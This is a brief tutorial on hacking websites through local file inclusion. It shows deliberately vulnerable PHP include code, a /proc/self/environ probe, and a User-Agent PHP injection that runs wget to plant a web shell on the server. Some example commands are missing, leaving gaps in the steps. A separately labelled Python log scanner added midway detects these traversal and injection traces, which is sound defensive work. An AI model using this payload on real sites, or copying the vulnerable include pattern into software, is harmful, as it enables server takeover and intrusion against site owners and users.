
Hacking Websites via LFI (Simple, Short and easy)

 1. Introduction
 2. /proc/self/environ
 3. PHP Injection
 4. Accessing the shell

1. Introduction

Remember LFI (local file inclusion)? This tutorial shows how a site vulnerable to LFI can be used to get a shell on the web server.

Here is an example of code that is vulnerable to LFI:

// LFI Vulnerable Code
$redirect = $_GET['redirect'];
include($redirect);

It is vulnerable because $redirect is not sanitized, therefore include($redirect); will load whatever path is supplied in $_GET['redirect'].

Here is an example of LFI on Unix (very old): (Unix) (Linux) (FreeBSD)

2. /proc/self/environ

To check if it is vulnerable, we enter this in the ../ part:

If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc., that means it is vulnerable.

If you get only a blank page, it isn't vulnerable.

3. PHP Injection

Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget -O gonullyourself.php');?>
Now, submit the request.

Our command will be executed.
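
Both steps above leave traces in the web server's access log: the traversal path sits in the redirect parameter and the PHP tag sits in the User-Agent field. The following Python script is an added example, not part of the original tutorial, that flags both in combined-format log lines. The sample log lines, the index.php script name and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip - - [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
# Traversal sequences and local files commonly requested through an LFI.
TRAVERSAL_RE = re.compile(r"\.\./|/proc/self/|/etc/passwd", re.I)

# Constructed sample lines (documentation IPs; index.php is a hypothetical name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?redirect=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?redirect=../../../../proc/self/environ HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?redirect=%252e%252e%252f%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?redirect=../../../proc/self/environ HTTP/1.1" 200 950 "-" "<?php echo \'constructed-marker\'; ?>"',
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ (%252e%252e%252f) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def inspect_line(line):
    """Return a list of findings for one access-log line (empty list if clean)."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return ["unparsed line"]
    findings = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = decode_fully(raw).replace("\\", "/")  # treat ..\ like ../
        if TRAVERSAL_RE.search(value):
            findings.append(f"path traversal in parameter '{name}'")
    if "<?" in decode_fully(m["ua"]):  # browsers never send a PHP open tag
        findings.append("PHP open tag in User-Agent")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_line(line) or "clean", "|", line[:60])
```

A line that carries both findings from the same client is the strongest signal, since it matches the full sequence this tutorial describes.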

4. Accessing the shell

To check if the command got executed, we will enter something like this:

If our shell is there, the command was successfully executed.

Easy :) Isn't it?